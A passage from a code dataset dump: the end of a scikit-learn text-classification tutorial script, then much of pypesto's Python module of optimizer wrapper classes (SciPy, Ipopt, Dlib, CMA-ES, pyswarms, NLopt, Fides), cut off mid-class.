TfidfTransformer()),\n ('clf', MultinomialNB()),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = text_clf.predict(test_data)\nprint('MultinomialNB', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n\n# --- can we do better using an SVM?\ntext_clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', SGDClassifier(loss='hinge', penalty='l2',\n alpha=1e-3, random_state=42,\n max_iter=5, tol=None)),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = text_clf.predict(test_data)\nprint('SGDClassifier', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n\n# --- parameter tuning using grid search\nparameters = {\n 'vect__ngram_range': [(1, 1), (1, 2)],\n 'tfidf__use_idf': (True, False),\n 'clf__alpha': (1e-1, 1e-2, 1e-3, 1e-4),\n}\n\ngs_clf = GridSearchCV(text_clf, parameters, cv=5, n_jobs=-1)\ngs_clf = gs_clf.fit(train_data, train_target)\n\nprint('GridSearchCV', gs_clf.best_score_)\nprint(gs_clf.best_params_)\n\n\n# --- take at look at the best parameter setting provided by GridSearchCV\n# XXX izé, ez miért is nem ua eredményt adja,\n# XXX mint a gs_clf.best_score_ ???\n# => arra számítottam volna erősen! :)\ntext_clf = Pipeline([\n ('vect', CountVectorizer(\n ngram_range=gs_clf.best_params_['vect__ngram_range'])),\n ('tfidf', TfidfTransformer(\n use_idf=gs_clf.best_params_['tfidf__use_idf'])),\n ('clf', SGDClassifier(\n loss='hinge',\n penalty='l2',\n alpha=gs_clf.best_params_['clf__alpha'],\n random_state=42,\n max_iter=5,\n tol=None\n )),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = text_clf.predict(test_data)\nprint('SGDClassifier/best', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n","repo_name":"sassbalint/ml","sub_path":"tut/sklearn_tut.py","file_name":"sklearn_tut.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10410104511","text":"from __future__ import annotations\n\nimport abc\nimport logging\nimport re\nimport time\nimport warnings\nfrom typing import TYPE_CHECKING, Dict, Optional\n\nimport numpy as np\nimport scipy.optimize\n\nfrom ..C import FVAL, GRAD, INNER_PARAMETERS, MODE_FUN, MODE_RES\nfrom ..history import (\n HistoryOptions,\n NoHistory,\n OptimizerHistory,\n create_history,\n)\nfrom ..objective import Objective\nfrom ..problem import Problem\nfrom ..result import OptimizerResult\nfrom .load import fill_result_from_history\nfrom .options import OptimizeOptions\nfrom .util import check_finite_bounds\n\nif TYPE_CHECKING:\n import fides\n\nlogger = logging.getLogger(__name__)\n\n\nclass OptimizerImportError(ImportError):\n \"\"\"Exception raised when an optimizer is not available.\"\"\"\n\n def __init__(self, optimizer: str):\n super().__init__(\n f'Optimizer \"{optimizer}\" not available, install corresponding '\n f'package e.g. via \"pip install pypesto[{optimizer}]\"'\n )\n\n\ndef history_decorator(minimize):\n \"\"\"Initialize and extract information stored in the history.\n\n Default decorator for the minimize() method.\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n if history_options is None:\n history_options = HistoryOptions()\n\n objective = problem.objective\n\n # initialize the objective\n objective.initialize()\n\n # initialize the history\n history = create_history(\n id=id,\n x_names=[problem.x_names[ix] for ix in problem.x_free_indices],\n options=history_options,\n )\n optimizer_history = OptimizerHistory(\n history=history,\n x0=x0,\n lb=problem.lb,\n ub=problem.ub,\n )\n\n # plug in history for the objective to record it\n objective.history = optimizer_history\n\n # perform the actual minimization\n try:\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n result.id = id\n objective.history.finalize(\n message=result.message, exitflag=result.exitflag\n )\n except Exception as err:\n if optimize_options.allow_failed_starts:\n logger.error(f'start {id} failed: {err}')\n result = OptimizerResult(\n x0=x0, exitflag=-1, message=str(err), id=id\n )\n else:\n raise\n\n # maybe override results from history depending on options\n result = fill_result_from_history(\n result=result,\n optimizer_history=objective.history,\n optimize_options=optimize_options,\n )\n\n # clean up, history is available from result\n objective.history = NoHistory()\n\n return result\n\n return wrapped_minimize\n\n\ndef time_decorator(minimize):\n \"\"\"Measure time of optimization.\n\n Default decorator for the minimize() method to take time.\n Currently, the method time.time() is used, which measures\n the wall-clock time.\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n start_time = time.time()\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n used_time = time.time() - start_time\n result.time = used_time\n return result\n\n return wrapped_minimize\n\n\ndef fix_decorator(minimize):\n \"\"\"Include also fixed parameters in the result arrays of minimize().\n\n Default decorator for the minimize() method (nans will be inserted in the\n derivatives).\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n # perform the actual optimization\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n\n # vectors to full vectors\n result.update_to_full(problem)\n\n logger.debug(\n f\"Final fval={result.fval:.4f}, time={result.time:.4f}s, \"\n f\"n_fval={result.n_fval}.\",\n )\n\n return result\n\n return wrapped_minimize\n\n\nclass Optimizer(abc.ABC):\n \"\"\"\n Optimizer base class, not functional on its own.\n\n An optimizer takes a problem, and possibly a start point, and then\n performs an optimization. It returns an OptimizerResult.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize base class.\"\"\"\n\n @abc.abstractmethod\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"\n Perform optimization.\n\n Parameters\n ----------\n problem:\n The problem to find optimal parameters for.\n x0:\n The starting parameters.\n id:\n Multistart id.\n history_options:\n Optimizer history options.\n optimize_options:\n Global optimization options.\n \"\"\"\n\n @abc.abstractmethod\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n return None\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0, return boolean.\"\"\"\n return True\n\n\nclass ScipyOptimizer(Optimizer):\n \"\"\"\n Use the SciPy optimizers.\n\n Find details on the optimizer and configuration options at:\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.\\\n optimize.minimize.html#scipy.optimize.minimize\n \"\"\"\n\n def __init__(\n self,\n method: str = 'L-BFGS-B',\n tol: float = None,\n options: Dict = None,\n ):\n super().__init__()\n\n self.method = method\n\n self.options = options\n if self.options is None:\n self.options = ScipyOptimizer.get_default_options(self)\n self.tol = tol\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} method={self.method}\"\n # print everything that is customized\n if self.tol is not None:\n rep += f\" tol={self.tol}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n objective = problem.objective\n\n if self.is_least_squares():\n # set tolerance to default of scipy optimizer\n tol = self.tol\n if tol is None:\n tol = 1e-8\n # is a residual based least squares method\n if not objective.has_res:\n raise Exception(\n \"For least squares optimization, the objective \"\n \"must be able to compute residuals.\"\n )\n\n ls_method = self.method[3:]\n bounds = (lb, ub)\n\n fun = objective.get_res\n jac = objective.get_sres if objective.has_sres else '2-point'\n # TODO: pass jac computing methods in options\n\n if self.options is not None:\n ls_options = self.options.copy()\n ls_options['verbose'] = (\n 2\n if 'disp' in ls_options.keys() and ls_options['disp']\n else 0\n )\n ls_options.pop('disp', None)\n ls_options['max_nfev'] = ls_options.pop('maxfun', None)\n else:\n ls_options = {}\n\n # optimize\n res = scipy.optimize.least_squares(\n fun=fun,\n x0=x0,\n method=ls_method,\n jac=jac,\n bounds=bounds,\n tr_solver=ls_options.pop(\n 'tr_solver', 'lsmr' if len(x0) > 1 else 'exact'\n ),\n loss='linear',\n ftol=tol,\n **ls_options,\n )\n # extract fval/grad from result, note that fval is not available\n # from least squares solvers\n grad = getattr(res, 'grad', None)\n fval = None\n else:\n # is an fval based optimization method\n\n if not objective.has_fun:\n raise Exception(\n \"For this optimizer, the objective must \"\n \"be able to compute function values\"\n )\n\n bounds = scipy.optimize.Bounds(lb, ub)\n\n # fun_may_return_tuple = self.method.lower() in \\\n # ['cg', 'bfgs', 'newton-cg', 'l-bfgs-b', 'tnc', 'slsqp',\n # 'dogleg', 'trust-ncg']\n # TODO: is it more efficient to have tuple as output of fun?\n method_supports_grad = self.method.lower() in [\n 'cg',\n 'bfgs',\n 'newton-cg',\n 'l-bfgs-b',\n 'tnc',\n 'slsqp',\n 'dogleg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-exact',\n 'trust-constr',\n ]\n method_supports_hess = self.method.lower() in [\n 'newton-cg',\n 'dogleg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-exact',\n 'trust-constr',\n ]\n method_supports_hessp = self.method.lower() in [\n 'newton-cg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-constr',\n ]\n # switch off passing over functions if not applicable (e.g.\n # NegLogParameterPrior) since grad/hess attributes do not exist\n if not isinstance(objective, Objective):\n if not hasattr(objective, 'grad'):\n objective.grad = False\n if not hasattr(objective, 'hess'):\n objective.hess = False\n # Todo Resolve warning by implementing saving of hess temporarily\n # in objective and pass to scipy seperately\n if objective.hess is True:\n warnings.warn(\n \"scipy.optimize.minimize does not support \"\n \"passing fun and hess as one function. Hence \"\n \"for each evaluation of hess, fun will be \"\n \"evaluated again. This can lead to increased \"\n \"computation times. If possible, separate fun \"\n \"and hess.\"\n )\n if objective.grad is True:\n\n def fun(x):\n return objective(x, sensi_orders=(0, 1))\n\n else:\n fun = objective.get_fval\n jac = (\n objective.get_grad\n if objective.has_grad\n and method_supports_grad\n and objective.grad is not True\n else (True if objective.grad is True else None)\n )\n hess = (\n objective.get_hess\n if objective.has_hess and method_supports_hess\n else None\n )\n hessp = (\n objective.get_hessp\n if objective.has_hessp and method_supports_hessp\n else None\n )\n # minimize will ignore hessp otherwise\n if hessp is not None:\n hess = None\n\n # optimize\n res = scipy.optimize.minimize(\n fun=fun,\n x0=x0,\n method=self.method,\n jac=jac,\n hess=hess,\n hessp=hessp,\n bounds=bounds,\n options=self.options,\n tol=self.tol,\n )\n # extract fval/grad from result\n grad = getattr(res, 'jac', None)\n fval = res.fun\n\n # fill in everything known, although some parts will be overwritten\n optimizer_result = OptimizerResult(\n x=np.array(res.x),\n fval=fval,\n grad=grad,\n hess=getattr(res, 'hess', None),\n exitflag=res.status,\n message=res.message,\n )\n if hasattr(objective, INNER_PARAMETERS) and objective.inner_parameters:\n optimizer_result[INNER_PARAMETERS] = objective.inner_parameters\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return re.match(r'(?i)^(ls_)', self.method)\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n if self.is_least_squares():\n options = {'max_nfev': 1000, 'disp': False}\n else:\n options = {'maxfun': 1000, 'disp': False}\n return options\n\n\nclass IpoptOptimizer(Optimizer):\n \"\"\"Use IpOpt (https://pypi.org/project/ipopt/) for optimization.\"\"\"\n\n def __init__(self, options: Dict = None):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n options:\n Options are directly passed on to `cyipopt.minimize_ipopt`.\n \"\"\"\n super().__init__()\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n try:\n import cyipopt\n except ImportError:\n raise OptimizerImportError(\"ipopt\")\n\n objective = problem.objective\n\n bounds = np.array([problem.lb, problem.ub]).T\n\n ret = cyipopt.minimize_ipopt(\n fun=objective.get_fval,\n x0=x0,\n method=None, # ipopt does not use this argument for anything\n jac=objective.get_grad,\n hess=None, # ipopt does not support Hessian yet\n hessp=None, # ipopt does not support Hessian vector product yet\n bounds=bounds,\n tol=None, # can be set via options\n options=self.options,\n )\n\n # the ipopt return object is a scipy.optimize.OptimizeResult\n return OptimizerResult(\n x=ret.x, exitflag=ret.status, message=ret.message\n )\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass DlibOptimizer(Optimizer):\n \"\"\"Use the Dlib toolbox for optimization.\"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n self.options = options\n if self.options is None:\n self.options = DlibOptimizer.get_default_options(self)\n elif 'maxiter' not in self.options:\n raise KeyError('Dlib options are missing the key word ' 'maxiter.')\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n check_finite_bounds(lb, ub)\n objective = problem.objective\n\n try:\n import dlib\n except ImportError:\n raise OptimizerImportError(\"dlib\")\n\n if not objective.has_fun:\n raise ValueError(\n \"For this optimizer, the objective must \"\n \"be able to return function values.\"\n )\n\n # dlib requires variable length arguments\n def get_fval_vararg(*x):\n return objective.get_fval(x)\n\n dlib.find_min_global(\n get_fval_vararg,\n list(lb),\n list(ub),\n int(self.options['maxiter']),\n 0.002,\n )\n\n optimizer_result = OptimizerResult()\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n return {'maxiter': 10000}\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warn(\"The Dlib optimizer does not support x0.\")\n return False\n\n\nclass PyswarmOptimizer(Optimizer):\n \"\"\"Global optimization using pyswarm.\"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n if options is None:\n options = {'maxiter': 200}\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n try:\n import pyswarm\n except ImportError:\n raise OptimizerImportError(\"pyswarm\")\n\n check_finite_bounds(lb, ub)\n\n xopt, fopt = pyswarm.pso(\n problem.objective.get_fval, lb, ub, **self.options\n )\n\n optimizer_result = OptimizerResult(x=np.array(xopt), fval=fopt)\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warn(\"The pyswarm optimizer does not support x0.\")\n return False\n\n\nclass CmaesOptimizer(Optimizer):\n \"\"\"\n Global optimization using covariance matrix adaptation evolutionary search.\n\n This optimizer interfaces the cma package\n (https://github.com/CMA-ES/pycma).\n \"\"\"\n\n def __init__(self, par_sigma0: float = 0.25, options: Dict = None):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n par_sigma0:\n scalar, initial standard deviation in each coordinate.\n par_sigma0 should be about 1/4th of the search domain width\n (where the optimum is to be expected)\n options:\n Optimizer options that are directly passed on to cma.\n \"\"\"\n super().__init__()\n\n if options is None:\n options = {'maxiter': 10000}\n self.options = options\n self.par_sigma0 = par_sigma0\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} par_sigma0={self.par_sigma0}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n check_finite_bounds(lb, ub)\n\n sigma0 = self.par_sigma0 * np.median(ub - lb)\n self.options['bounds'] = [lb, ub]\n\n try:\n import cma\n except ImportError:\n raise OptimizerImportError(\"cma\")\n\n result = (\n cma.CMAEvolutionStrategy(\n x0,\n sigma0,\n inopts=self.options,\n )\n .optimize(problem.objective.get_fval)\n .result\n )\n\n optimizer_result = OptimizerResult(\n x=np.array(result[0]), fval=result[1]\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass ScipyDifferentialEvolutionOptimizer(Optimizer):\n \"\"\"\n Global optimization using scipy's differential evolution optimizer.\n\n Package homepage: https://docs.scipy.org/doc/scipy/reference/generated\\\n /scipy.optimize.differential_evolution.html\n\n Parameters\n ----------\n options:\n Optimizer options that are directly passed on to scipy's optimizer.\n\n\n Examples\n --------\n Arguments that can be passed to options:\n\n maxiter:\n used to calculate the maximal number of funcion evaluations by\n maxfevals = (maxiter + 1) * popsize * len(x)\n Default: 100\n popsize:\n population size, default value 15\n \"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n if options is None:\n options = {'maxiter': 100}\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n bounds = list(zip(problem.lb, problem.ub))\n\n result = scipy.optimize.differential_evolution(\n problem.objective.get_fval, bounds, x0=x0, **self.options\n )\n\n optimizer_result = OptimizerResult(\n x=np.array(result.x), fval=result.fun\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass PyswarmsOptimizer(Optimizer):\n \"\"\"\n Global optimization using pyswarms.\n\n Package homepage: https://pyswarms.readthedocs.io/en/latest/index.html\n\n Parameters\n ----------\n par_popsize:\n number of particles in the swarm, default value 10\n\n options:\n Optimizer options that are directly passed on to pyswarms.\n c1: cognitive parameter\n c2: social parameter\n w: inertia parameter\n Default values are (c1,c2,w) = (0.5, 0.3, 0.9)\n\n Examples\n --------\n Arguments that can be passed to options:\n\n maxiter:\n used to calculate the maximal number of funcion evaluations.\n Default: 1000\n \"\"\"\n\n def __init__(self, par_popsize: float = 10, options: Dict = None):\n super().__init__()\n\n all_options = {'maxiter': 1000, 'c1': 0.5, 'c2': 0.3, 'w': 0.9}\n if options is None:\n options = {}\n all_options.update(options)\n self.options = all_options\n self.par_popsize = par_popsize\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} par_popsize={self.par_popsize}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n try:\n import pyswarms\n except ImportError:\n raise OptimizerImportError(\"pyswarms\")\n\n # check for finite values for the bounds\n if np.isfinite(lb).all() is np.False_:\n raise ValueError(\n \"This optimizer can only handle finite lower bounds.\"\n )\n if np.isfinite(ub).all() is np.False_:\n raise ValueError(\n \"This optimizer can only handle finite upper bounds.\"\n )\n\n optimizer = pyswarms.single.global_best.GlobalBestPSO(\n n_particles=self.par_popsize,\n dimensions=len(x0),\n options=self.options,\n bounds=(lb, ub),\n # init_pos=x0, # TODO: is a problem if x0 is not of the swarm size\n )\n\n def successively_working_fval(swarm: np.ndarray) -> np.ndarray:\n \"\"\"Evaluate the function for all parameters in the swarm object.\n\n Parameters\n ----------\n swarm: np.ndarray, shape (n_particales_in_swarm, n_parameters)\n\n Returns\n -------\n result: np.ndarray, shape (n_particles_in_swarm)\n \"\"\"\n n_particles = swarm.shape[0]\n result = np.zeros(n_particles)\n # iterate over the particles in the swarm\n for i_particle, par in enumerate(swarm):\n result[i_particle] = problem.objective.get_fval(par)\n\n return result\n\n cost, pos = optimizer.optimize(\n successively_working_fval,\n iters=self.options['maxiter'],\n verbose=False,\n )\n\n optimizer_result = OptimizerResult(\n x=pos,\n fval=float(cost),\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warn(\"The pyswarms optimizer does not support x0.\")\n return False\n\n\nclass NLoptOptimizer(Optimizer):\n \"\"\"\n Global/Local optimization using NLopt.\n\n Package homepage: https://nlopt.readthedocs.io/en/latest/\n \"\"\"\n\n def __init__(\n self,\n method=None,\n local_method=None,\n options: Dict = None,\n local_options: Dict = None,\n ):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n method:\n Local or global Optimizer to use for minimization.\n local_method:\n Local method to use in combination with the global optimizer (\n for the MLSL family of solvers) or to solve a subproblem (for the\n AUGLAG family of solvers)\n options:\n Optimizer options. scipy option `maxiter` is automatically\n transformed into `maxeval` and takes precedence.\n local_options:\n Optimizer options for the local method\n \"\"\"\n super().__init__()\n\n if options is None:\n options = {}\n elif 'maxiter' in options:\n options['maxeval'] = options.pop('maxiter')\n if local_options is None:\n local_options = {}\n self.options = options\n self.local_options = local_options\n\n try:\n import nlopt\n except ImportError:\n raise OptimizerImportError(\"nlopt\")\n\n if method is None:\n method = nlopt.LD_LBFGS\n\n needs_local_method = [\n nlopt.G_MLSL,\n nlopt.G_MLSL_LDS,\n nlopt.GD_MLSL,\n nlopt.GD_MLSL_LDS,\n nlopt.AUGLAG,\n nlopt.AUGLAG_EQ,\n ]\n\n if local_method is None and method in needs_local_method:\n local_method = nlopt.LD_LBFGS\n\n if local_method is not None and method not in needs_local_method:\n raise ValueError(\n f'Method \"{method}\" does not allow a local '\n f'method. Please set `local_method` to None.'\n )\n\n self.local_methods = [\n nlopt.LD_VAR1,\n nlopt.LD_VAR2,\n nlopt.LD_TNEWTON_PRECOND_RESTART,\n nlopt.LD_TNEWTON_PRECOND,\n nlopt.LD_TNEWTON_RESTART,\n nlopt.LD_TNEWTON,\n nlopt.LD_LBFGS,\n nlopt.LD_SLSQP,\n nlopt.LD_CCSAQ,\n nlopt.LD_MMA,\n nlopt.LN_SBPLX,\n nlopt.LN_NELDERMEAD,\n nlopt.LN_PRAXIS,\n nlopt.LN_NEWUOA,\n nlopt.LN_NEWUOA_BOUND,\n nlopt.LN_BOBYQA,\n nlopt.LN_COBYLA,\n ]\n self.global_methods = [\n nlopt.GN_ESCH,\n nlopt.GN_ISRES,\n nlopt.GN_AGS,\n nlopt.GD_STOGO,\n nlopt.GD_STOGO_RAND,\n nlopt.G_MLSL,\n nlopt.G_MLSL_LDS,\n nlopt.GD_MLSL,\n nlopt.GD_MLSL_LDS,\n nlopt.GN_CRS2_LM,\n nlopt.GN_ORIG_DIRECT,\n nlopt.GN_ORIG_DIRECT_L,\n nlopt.GN_DIRECT,\n nlopt.GN_DIRECT_L,\n nlopt.GN_DIRECT_L_NOSCAL,\n nlopt.GN_DIRECT_L_RAND,\n nlopt.GN_DIRECT_L_RAND_NOSCAL,\n ]\n self.hybrid_methods = [nlopt.AUGLAG, nlopt.AUGLAG_EQ]\n methods = (\n self.local_methods + self.global_methods + self.hybrid_methods\n )\n\n if method not in methods:\n raise ValueError(\n f'\"{method}\" is not a valid method. Valid '\n f'methods are: {methods}'\n )\n\n self.method = method\n\n if local_method is not None and local_method not in self.local_methods:\n raise ValueError(\n f'\"{local_method}\" is not a valid method. Valid '\n f'methods are: {self.local_methods}'\n )\n\n self.local_method = local_method\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} method={self.method}\"\n # print everything that is customized\n if self.local_method is not None:\n rep += f\" local_method={self.local_method}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n if self.local_options is not None:\n rep += f\" local_options={self.local_methods}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n import nlopt\n\n opt = nlopt.opt(self.method, problem.dim)\n\n valid_options = [\n 'ftol_abs',\n 'ftol_rel',\n 'xtol_abs',\n 'xtol_rel',\n 'stopval',\n 'x_weights',\n 'maxeval',\n 'maxtime',\n 'initial_step',\n ]\n\n def set_options(o, options):\n for option, value in options.items():\n if option not in valid_options:\n raise ValueError(\n f'\"{option}\" is not a valid option. Valid '\n f'options are: {valid_options}'\n )\n getattr(o, f'set_{option}')(value)\n\n if self.local_method is not None:\n local_opt = nlopt.opt(self.local_method, problem.dim)\n set_options(local_opt, self.local_options)\n opt.set_local_optimizer(local_opt)\n\n if self.method in self.global_methods:\n check_finite_bounds(problem.ub, problem.lb)\n\n opt.set_lower_bounds(problem.lb)\n opt.set_upper_bounds(problem.ub)\n\n def nlopt_objective(x, grad):\n if grad.size > 0:\n sensi_orders = (0, 1)\n else:\n sensi_orders = (0,)\n r = problem.objective(x, sensi_orders, MODE_FUN, True)\n if grad.size > 0:\n grad[:] = r[GRAD] # note that this must be inplace\n return r[FVAL]\n\n opt.set_min_objective(nlopt_objective)\n\n set_options(opt, self.options)\n try:\n result = opt.optimize(x0)\n msg = 'Finished Successfully.'\n except (\n nlopt.RoundoffLimited,\n nlopt.ForcedStop,\n ValueError,\n RuntimeError,\n MemoryError,\n ) as e:\n result = None\n msg = str(e)\n\n optimizer_result = OptimizerResult(\n x=result,\n fval=opt.last_optimum_value(),\n message=msg,\n exitflag=opt.last_optimize_result(),\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports multiple initial guesses.\"\"\"\n import nlopt\n\n if self.method in (\n nlopt.GN_AGS,\n nlopt.GD_STOGO,\n nlopt.GD_STOGO_RAND,\n nlopt.GN_ORIG_DIRECT,\n nlopt.GN_ORIG_DIRECT_L,\n nlopt.GN_DIRECT,\n nlopt.GN_DIRECT_L,\n nlopt.GN_DIRECT_L_NOSCAL,\n nlopt.GN_DIRECT_L_RAND,\n nlopt.GN_DIRECT_L_RAND_NOSCAL,\n ):\n if x_guesses is not None and x_guesses.size > 0:\n logger.warn(\n f\"The NLopt optimizer method {self.method} does \"\n \"not support x0.\"\n )\n return False\n return True\n\n\nclass FidesOptimizer(Optimizer):\n \"\"\"\n Global/Local optimization using the trust region optimizer fides.\n\n Package Homepage: https://fides-optimizer.readthedocs.io/en/latest\n \"\"\"\n\n def __init__(\n self,\n hessian_update: Optional[\n fides.hessian_approximation.HessianApproximation\n ] = 'default',\n options: Optional[Dict] = None,\n verbose: Optional[int] = logging.INFO,\n ):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n options:\n Optimizer options.\n hessian_update:\n Hessian update strategy. If this is None, a 